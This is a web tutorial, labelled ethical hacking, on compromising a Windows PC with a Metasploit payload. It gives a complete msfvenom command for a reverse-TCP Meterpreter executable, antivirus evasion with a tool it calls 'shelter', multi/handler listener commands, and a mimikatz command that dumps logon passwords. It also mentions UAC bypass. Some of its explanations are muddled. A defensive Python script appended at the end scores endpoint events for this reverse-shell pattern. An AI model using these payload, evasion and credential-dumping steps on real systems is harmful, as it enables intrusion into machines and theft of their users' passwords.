Can Windows be hacked? The answer is yes. There are many methods by which Windows can be hacked, and one of them is the payload method. In this ethical hacking project, you will learn to hack Windows using the payload method.
# Kali Linux
Let's Start :
We need Metasploit in Kali Linux to create a payload.
What is Metasploit?
It is a framework mostly used by hackers to set up a listener and manipulate machines. We will use this framework in Kali Linux to create a payload for Windows.
Creating a malicious executable Exe file:
To create a malicious file, we will use msfvenom.
With these commands we create a malicious exe file:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/pj.exe
(you can use any name .exe)
The command above instructs msfvenom to generate an executable file that implements a reverse TCP connection for the payload.
Here LHOST is the IP address of our machine.
LPORT is the port that listens for the connection from the target.
(If you want to know your IP address, just type ifconfig in the terminal.)
Now the payload is ready but now we have to bypass the antivirus, we’ll encode it to make it undetectable.
Making it undetectable :
To encode our file we use the shelter, shelter changes the signature of the file to new and unique. But as we know the antivirus also scans the behavior of the payload file. it scans the file 7-10 times. So that is why we are using the shelter to whole encode the file. Also note that while encoding the payload file disables the automatic submission, otherwise it can be detected by the antivirus.
So to install shelter in Kali Linux, run the commands :
Sudo apt-get install shelter
After running this command the shelter will initialize, so select ‘Y’ yes when it asks to !!
After the installation it will ask you, to enter the payload either in listed or custom. Choose the listed as ‘L’.
After that select the index position, choose Meterpreter_Reverse_TCP.
After that, it will ask you for the LHOST and LPORT, after entering these requirements hit enter.
Then it will run the completion.
Wait for some time, it will provide you an undetectable .exe payload file.
Msf console :
Now, we need to set up the listener on the port.
So type msfconsole in the Kali Linux terminal.
Now use these commands :
# use multi/handler
# set payload windows/meterpreter/reverse_tcp
# set LHOST (your ip)
# set LPORT 4444
After you enter these commands in the terminal, the TCP handler starts waiting for the connection.
Now execute the payload on the Windows machine.
After the payload is executed on the Windows system, we receive the Meterpreter session in our Kali Linux terminal.
However, it will show "access denied" in the terminal. So we check the ID by running the getuid command in the terminal; it will tell you the user ID.
To show that the user lacks privileges, run this command:
mimikatz_command -f sekurlsa::logonPasswords
So you will get access to the PC. If you are somehow not able to gain access, then you need to do UAC bypassing.
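From the defending side, the reverse TCP session described above shows up in endpoint telemetry as an outbound connection opened by an executable sitting in a user-writable folder. The following added example (not part of the original tutorial) scores constructed events, shaped loosely like Sysmon network-connection records, for that pattern; the field names, the egress baseline, the threshold and the sample hosts are assumptions.

```python
import ntpath

# Constructed sample events; field names are simplified assumptions, not a real log schema.
EVENTS = [
    {"host": "WS-01", "image": r"C:\Users\alice\Downloads\pj.exe",
     "initiated": True, "dst_ip": "192.168.100.4", "dst_port": 4444},
    {"host": "WS-01", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "initiated": True, "dst_ip": "93.184.216.34", "dst_port": 443},
    {"host": "WS-02", "image": r"C:\Users\bob\AppData\Local\Temp\setup.exe",
     "initiated": True, "dst_ip": "10.0.0.9", "dst_port": 8443},
    {"host": "WS-02", "image": r"C:\Windows\System32\svchost.exe",
     "initiated": False, "dst_ip": "10.0.0.7", "dst_port": 3389},
]

USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\windows\\temp\\")
EXPECTED_PORTS = {53, 80, 123, 443}   # assumed egress baseline for workstations
PAGE_LPORT = 4444                     # listener port used in the tutorial above
THRESHOLD = 3                         # assumed alerting threshold

def score(event):
    """Return (points, reasons) for one network-connection event."""
    if not event["initiated"]:        # only connections the host itself opened
        return 0, []
    points, reasons = 0, []
    if any(part in event["image"].lower() for part in USER_WRITABLE):
        points += 2
        reasons.append("executable runs from a user-writable path")
    if event["dst_port"] not in EXPECTED_PORTS:
        points += 1
        reasons.append("destination port outside egress baseline")
    if event["dst_port"] == PAGE_LPORT:
        points += 2
        reasons.append("destination port 4444")
    return points, reasons

def triage(events):
    """Return findings at or above THRESHOLD, highest score first."""
    findings = []
    for event in events:
        points, reasons = score(event)
        if points >= THRESHOLD:
            findings.append({"host": event["host"], "score": points,
                             "process": ntpath.basename(event["image"]),
                             "dst": f'{event["dst_ip"]}:{event["dst_port"]}',
                             "reasons": reasons})
    return sorted(findings, key=lambda f: f["score"], reverse=True)

if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

The path and baseline checks carry most of the weight, so a finding still fires when the destination port differs from the one used on this page.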